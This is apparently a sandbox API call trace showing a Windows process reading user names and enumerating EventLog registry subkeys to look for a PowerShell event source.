	[0561.441] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x32c) returned 0x0
	[0561.441] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.441] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x330) returned 0x0
	[0561.441] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.441] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x334) returned 0x0
	[0561.441] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x338) returned 0x0
	[0561.442] RegCloseKey (hKey=0x338) returned 0x0
	[0561.442] RegCloseKey (hKey=0x2ec) returned 0x0
	[0561.443] RegCloseKey (hKey=0x334) returned 0x0
	[0562.947] CoTaskMemAlloc (cb=0x804) returned 0x1b9801f0
	[0562.947] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9801f0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0562.949] CoTaskMemFree (pv=0x1b9801f0) 
	[0562.950] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.950] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0562.950] CoTaskMemFree (pv=0x1394c0) 
	[0562.987] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d288 | out: phkResult=0x24d288*=0x33c) returned 0x0
	[0562.987] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.987] CoTaskMemFree (pv=0x0) 
	[0562.987] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.987] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.987] CoTaskMemFree (pv=0x1394c0) 
	[0562.987] CoTaskMemFree (pv=0x0) 
	[0562.987] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.987] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.988] CoTaskMemFree (pv=0x1394c0) 
	[0562.988] CoTaskMemFree (pv=0x0) 
	[0562.988] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.988] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.989] CoTaskMemFree (pv=0x1394c0) 
	[0562.989] CoTaskMemFree (pv=0x0) 
	[0562.989] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0562.989] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0562.989] CoTaskMemFree (pv=0x1394c0) 
	[0562.989] CoTaskMemFree (pv=0x0) 
	[0562.989] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x340) returned 0x0
	[0562.989] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.989] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x344) returned 0x0
	[0562.989] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.989] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x348) returned 0x0
	[0562.989] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.989] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x34c) returned 0x0
	[0562.989] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.990] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x350) returned 0x0
	[0562.990] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.990] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x354) returned 0x0
	[0562.990] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.990] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x358) returned 0x0
	[0562.990] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.990] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x35c) returned 0x0
	[0562.990] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0562.990] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x360) returned 0x0
	[0562.990] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x364) returned 0x0
	[0562.990] RegCloseKey (hKey=0x364) returned 0x0
	[0562.991] RegCloseKey (hKey=0x33c) returned 0x0
	[0562.991] RegCloseKey (hKey=0x360) returned 0x0
	[0564.504] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d288 | out: phkResult=0x24d288*=0x360) returned 0x0
	[0564.504] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.504] CoTaskMemFree (pv=0x0) 
	[0564.504] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.504] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.504] CoTaskMemFree (pv=0x1394c0) 
	[0564.504] CoTaskMemFree (pv=0x0) 
	[0564.504] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.504] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.504] CoTaskMemFree (pv=0x1394c0) 
	[0564.504] CoTaskMemFree (pv=0x0) 
	[0564.504] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.504] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.504] CoTaskMemFree (pv=0x1394c0) 
	[0564.504] CoTaskMemFree (pv=0x0) 
	[0564.504] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.504] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.504] CoTaskMemFree (pv=0x1394c0) 
	[0564.504] CoTaskMemFree (pv=0x0) 
	[0564.505] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.505] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.505] CoTaskMemFree (pv=0x1394c0) 
	[0564.505] CoTaskMemFree (pv=0x0) 
	[0564.505] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.505] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.505] CoTaskMemFree (pv=0x1394c0) 
	[0564.505] CoTaskMemFree (pv=0x0) 
	[0564.505] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.505] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.505] CoTaskMemFree (pv=0x1394c0) 
	[0564.505] CoTaskMemFree (pv=0x0) 
	[0564.505] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.505] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.505] CoTaskMemFree (pv=0x1394c0) 
	[0564.505] CoTaskMemFree (pv=0x0) 
	[0564.505] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.505] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x1394c0, lpcchName=0x24d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.505] CoTaskMemFree (pv=0x1394c0) 
	[0564.505] CoTaskMemFree (pv=0x0) 
	[0564.505] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x33c) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x364) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x368) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x36c) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x370) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x374) returned 0x0
	[0564.506] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.506] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x378) returned 0x0
	[0564.507] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.507] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x37c) returned 0x0
	[0564.507] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x0) returned 0x2
	[0564.507] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x380) returned 0x0
	[0564.507] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x384) returned 0x0
	[0564.507] RegCloseKey (hKey=0x384) returned 0x0
	[0564.507] RegCloseKey (hKey=0x360) returned 0x0
	[0564.508] RegCloseKey (hKey=0x380) returned 0x0
	[0564.508] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d258 | out: phkResult=0x24d258*=0x380) returned 0x0
	[0564.508] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x1394c0) 
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x1394c0) 
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x1394c0) 
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x1394c0) 
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.509] CoTaskMemFree (pv=0x1394c0) 
	[0564.509] CoTaskMemFree (pv=0x0) 
	[0564.509] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.509] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.510] CoTaskMemFree (pv=0x1394c0) 
	[0564.510] CoTaskMemFree (pv=0x0) 
	[0564.510] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.510] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.510] CoTaskMemFree (pv=0x1394c0) 
	[0564.510] CoTaskMemFree (pv=0x0) 
	[0564.510] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.510] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.510] CoTaskMemFree (pv=0x1394c0) 
	[0564.510] CoTaskMemFree (pv=0x0) 
	[0564.510] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0564.510] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x1394c0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0564.510] CoTaskMemFree (pv=0x1394c0) 
	[0564.510] CoTaskMemFree (pv=0x0) 
	[0564.510] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x360) returned 0x0
	[0564.510] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.510] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x384) returned 0x0
	[0564.510] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x388) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x38c) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x390) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x394) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x398) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
